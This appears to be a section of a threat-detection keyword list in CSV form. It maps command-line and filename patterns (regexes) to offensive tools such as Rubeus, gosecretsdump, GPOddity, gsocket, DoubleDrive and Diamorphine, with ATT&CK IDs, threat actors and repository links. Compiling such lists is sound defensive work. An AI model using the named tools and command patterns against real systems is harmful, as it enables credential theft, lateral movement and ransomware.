"* goldenPac.py -c *.exe*",".{0,1000}\sgoldenPac\.py\s\-c\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","1355"
"* goldenPac.py*",".{0,1000}\sgoldenPac\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","1356"
"* google_drive_doubledrive.py*",".{0,1000}\sgoogle_drive_doubledrive\.py.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","1357"
"* gopher-ls.nse*",".{0,1000}\sgopher\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1358"
"* gophish-*.zip*",".{0,1000}\sgophish\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","0","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","1359"
"* gosecretsdump_linux*",".{0,1000}\sgosecretsdump_linux.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#linux","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","1360"
"* gosecretsdump_mac*",".{0,1000}\sgosecretsdump_mac.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","1361"
"* gosecretsdump_win*",".{0,1000}\sgosecretsdump_win.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","1362"
"* GOTO :removeantivirus*",".{0,1000}\sGOTO\s\:removeantivirus.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#content","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","1365"
"* goWMIExec_linux_*",".{0,1000}\sgoWMIExec_linux_.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","#linux","N/A","10","3","214","42","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z","1367"
"* goWMIExec_mac_*",".{0,1000}\sgoWMIExec_mac_.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","N/A","N/A","10","3","214","42","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z","1368"
"* goWMIExec_win_*",".{0,1000}\sgoWMIExec_win_.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","N/A","N/A","10","3","214","42","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z","1369"
"* GPOBrowser.py*",".{0,1000}\sGPOBrowser\.py.{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","0","N/A","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","1370"
"* 'GPODDITY$' *",".{0,1000}\s\'GPODDITY\$\'\s.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","1371"
"* --gpo-id * --domain * --command *",".{0,1000}\s\-\-gpo\-id\s.{0,1000}\s\-\-domain\s.{0,1000}\s\-\-command\s.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","1372"
"* --gpo-id * --gpo-type * --no-smb-server *",".{0,1000}\s\-\-gpo\-id\s.{0,1000}\s\-\-gpo\-type\s.{0,1000}\s\-\-no\-smb\-server\s.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","1373"
"* --GPOName * --FilterEnabled --TargetDnsName *",".{0,1000}\s\-\-GPOName\s.{0,1000}\s\-\-FilterEnabled\s\-\-TargetDnsName\s.{0,1000}","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004  ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","N/A","10","1162","143","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z","1374"
"* gpp_autologin*",".{0,1000}\sgpp_autologin.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","1375"
"* gpp_password*",".{0,1000}\sgpp_password.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","1376"
"* gpsd-info.nse*",".{0,1000}\sgpsd\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1377"
"* Graphpython.py*",".{0,1000}\sGraphpython\.py.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","0","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","1378"
"*--------------------- GraphRunner Module ----------------------*",".{0,1000}\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\sGraphRunner\sModule\s\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","#content","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","1379"
"* GraphRunner.ps1*",".{0,1000}\sGraphRunner\.ps1.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","1380"
"* GraphSpy.py*",".{0,1000}\sGraphSpy\.py.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1078.004 - T1110.003 - T1071.001 - T1566.002 - T1656","TA0001 - TA0006 - TA0003 - TA0005 - TA0008","N/A","N/A","Collection","https://github.com/RedByte1337/GraphSpy","1","0","N/A","N/A","10","7","680","72","2025-04-15T21:07:15Z","2024-02-07T19:47:15Z","1381"
"* GraphStrike.py*",".{0,1000}\sGraphStrike\.py.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005  - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","1382"
"* GreatSCT/*",".{0,1000}\sGreatSCT\/.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","N/A","10","1127","202","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z","1383"
"* --greeting * --personalize *--securelink*",".{0,1000}\s\-\-greeting\s.{0,1000}\s\-\-personalize\s.{0,1000}\-\-securelink.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","Black Basta","Phishing","https://github.com/Octoberfest7/TeamsPhisher","1","0","N/A","N/A","N/A","10","1073","138","2024-06-19T21:41:55Z","2023-07-03T02:19:47Z","1384"
"* -grouper2 -Command *",".{0,1000}\s\-grouper2\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","1385"
"* GS_STTY_INIT_HACK*",".{0,1000}\sGS_STTY_INIT_HACK.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","1386"
"* gserver/Dockerfile *",".{0,1000}\sgserver\/Dockerfile\s.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","N/A","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","1387"
"* gs-netcat *",".{0,1000}\sgs\-netcat\s.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","1388"
"* gsocket-*.tar.gz*",".{0,1000}\sgsocket\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","1389"
"* gsocket.io/x*",".{0,1000}\sgsocket\.io\/x.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","1390"
"* gsocket_*_all.deb*",".{0,1000}\sgsocket_.{0,1000}_all\.deb.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","1391"
"* GSOCKET_SOCKS_IP*",".{0,1000}\sGSOCKET_SOCKS_IP.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","1392"
"* gtfobin_update.py*",".{0,1000}\sgtfobin_update\.py.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","1393"
"* gtfonow.py*",".{0,1000}\sgtfonow\.py.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","1394"
"* gtunnel-server-debug*",".{0,1000}\sgtunnel\-server\-debug.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","N/A","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","1395"
"* -H * -u * -p * -r *C$/Users*",".{0,1000}\s\-H\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-r\s.{0,1000}C\$\/Users.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","MuddyWater - Dispossessor","Discovery","https://github.com/ShawnDEvans/smbmap","1","0","N/A","N/A","10","10","1890","359","2025-02-28T18:09:10Z","2015-03-16T13:15:00Z","1397"
"* -h *-p * -c cypher.bin -k key.bin*",".{0,1000}\s\-h\s.{0,1000}\-p\s.{0,1000}\s\-c\scypher\.bin\s\-k\skey\.bin.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","N/A","10","3","292","47","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z","1398"
"* hack.py*",".{0,1000}\shack\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1399"
"* HackBrowserData*",".{0,1000}\sHackBrowserData.{0,1000}","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","0","N/A","N/A","10","10","175","25","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z","1400"
"* hacked_getdents*",".{0,1000}\shacked_getdents.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1986","451","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z","1401"
"* hackergu *",".{0,1000}\shackergu\s.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1402"
"* hackshell.sh*",".{0,1000}\shackshell\.sh.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","0","N/A","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","1403"
"* hadoop-datanode-info.nse*",".{0,1000}\shadoop\-datanode\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1404"
"* hadoop-jobtracker-info.nse*",".{0,1000}\shadoop\-jobtracker\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1405"
"* hadoop-namenode-info.nse*",".{0,1000}\shadoop\-namenode\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1406"
"* hadoop-secondary-namenode-info.nse*",".{0,1000}\shadoop\-secondary\-namenode\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1407"
"* hadoop-tasktracker-info.nse*",".{0,1000}\shadoop\-tasktracker\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1408"
"* Hak5.sh*",".{0,1000}\sHak5\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","1409"
"* harvest * /monitorinterval:*",".{0,1000}\sharvest\s.{0,1000}\s\/monitorinterval\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","1410"
